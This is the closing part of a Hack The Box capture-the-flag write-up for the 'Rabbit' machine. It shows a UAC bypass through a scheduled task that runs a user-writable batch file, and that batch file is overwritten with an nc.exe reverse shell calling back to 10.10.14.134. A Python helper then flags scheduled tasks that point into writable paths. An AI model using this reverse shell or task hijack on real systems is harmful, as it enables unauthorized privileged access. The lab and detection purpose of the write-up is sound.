After wasting some time on it I realized it’s just another rabbit hole. However, when I tried to run the schtask it made an attempt to run, which means the task was set to run with highest privileges. So I’ll be able to bypass UAC using the schtask. I added an nc shell to the test.bat file and ran the task, which gave me a shell with highest privs.

C:\Users\Raziel\AppData\Local\Temp\xyz>echo cmd.exe /c C:\Users\Raziel\AppData\Local\Temp\xyz\nc.exe 10.10.14.134 53 -e cmd.exe > test.bat
echo cmd.exe /c C:\Users\Raziel\AppData\Local\Temp\xyz\nc.exe 10.10.14.134 53 -e cmd.exe > test.bat

C:\Users\Raziel\AppData\Local\Temp\xyz>schtasks /run /tn "System Maintenance"
schtasks /run /tn "System Maintenance"
SUCCESS: Attempted to run the scheduled task "System Maintenance".

C:\Users\Raziel\AppData\Local\Temp\xyz>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

Getting the shell as raziel….

C:\Users\Administrator\Desktop>whoami /priv
PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                                                    State
=============================== ============================================================== ========
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process                             Disabled
SeMachineAccountPrivilege       Add workstations to domain                                     Disabled
SeSecurityPrivilege             Manage auditing and security log                               Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects                       Disabled
SeLoadDriverPrivilege           Load and unload device drivers                                 Disabled
SeSystemProfilePrivilege        Profile system performance                                     Disabled
SeSystemtimePrivilege           Change the system time                                         Disabled
SeProfileSingleProcessPrivilege Profile single process                                         Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority                                   Disabled
SeCreatePagefilePrivilege       Create a pagefile                                              Disabled
SeBackupPrivilege               Back up files and directories                                  Disabled
SeRestorePrivilege              Restore files and directories                                  Disabled
SeShutdownPrivilege             Shut down the system                                           Disabled
SeDebugPrivilege                Debug programs                                                 Disabled
SeSystemEnvironmentPrivilege    Modify firmware environment values                             Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                                       Enabled
SeRemoteShutdownPrivilege       Force shutdown from a remote system                            Disabled
SeUndockPrivilege               Remove computer from docking station                           Disabled
SeEnableDelegationPrivilege     Enable computer and user accounts to be trusted for delegation Disabled
SeManageVolumePrivilege         Perform volume maintenance tasks                               Disabled
SeImpersonatePrivilege          Impersonate a client after authentication                      Enabled
SeCreateGlobalPrivilege         Create global objects                                          Enabled
SeIncreaseWorkingSetPrivilege   Increase a process working set                                 Disabled
SeTimeZonePrivilege             Change the time zone                                           Disabled
SeCreateSymbolicLinkPrivilege   Create symbolic links                                          Disabled

C:\Users\Administrator\Desktop>whoami  
whoami
htb\raziel

C:\Users\Administrator\Desktop>type root.txt
type root.txt
---------------------NOPE-------------------------
C:\Users\Administrator\Desktop>
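
What made this path possible is a scheduled task whose action is a batch file inside a user's Temp directory, which that user can rewrite. The Python below is an added example, not from the original write-up: it parses `schtasks /query /v /fo list` output and flags task actions that point into commonly user-writable locations. The sample combines the "System Maintenance" fields shown above with one constructed benign task, and the list of path patterns is an assumption.

```python
import re

# Constructed sample in `schtasks /query /v /fo list` layout.
SAMPLE = r"""
HostName:                             RABBIT
TaskName:                             \System Maintenance
Author:                               HTB\Administrator
Task To Run:                          cmd.exe /c C:\Users\Raziel\AppData\Local\Temp\xyz\test.bat
Run As User:                          HTB\Raziel

HostName:                             RABBIT
TaskName:                             \Constructed Benign Task
Author:                               HTB\Administrator
Task To Run:                          C:\Windows\System32\defrag.exe C: /U
Run As User:                          SYSTEM
"""

WANTED = {"TaskName", "Author", "Task To Run", "Run As User"}

# Heuristic list of locations a standard user can usually write to.
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\(appdata|desktop|documents|downloads)\\"
    r"|\\users\\public\\|\\programdata\\|\\temp\\",
    re.IGNORECASE,
)

# Absolute Windows paths without spaces; quoted paths with spaces need more care.
PATH = re.compile(r'[A-Za-z]:\\[^\s"]+')


def parse_tasks(text):
    """Splits the list output into one dict per task (a record starts at HostName)."""
    tasks, current = [], None
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if key == "HostName":
            current = {}
            tasks.append(current)
        elif current is not None and key in WANTED:
            current[key] = value
    return tasks


def risky_actions(text):
    """Returns tasks whose action references a file under a user-writable path."""
    findings = []
    for task in parse_tasks(text):
        for path in PATH.findall(task.get("Task To Run", "")):
            if USER_WRITABLE.search(path):
                findings.append(
                    {
                        "task": task.get("TaskName"),
                        "author": task.get("Author"),
                        "run_as": task.get("Run As User"),
                        "path": path,
                    }
                )
    return findings


if __name__ == "__main__":
    for finding in risky_actions(SAMPLE):
        print(finding)
```

A path match is only a lead; confirm the actual permissions on the flagged file and its parent directory with icacls before treating it as a finding.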

So, that’s it. Let me know how my first write-up was in the comments section.

You can find me at https://www.hackthebox.eu/home/users/profile/8308 or on Mattermost at https://chat.netsecfocus.com.

The artwork used to head this article is called 'Halfone Rabbit' and it was created by Retro Supply.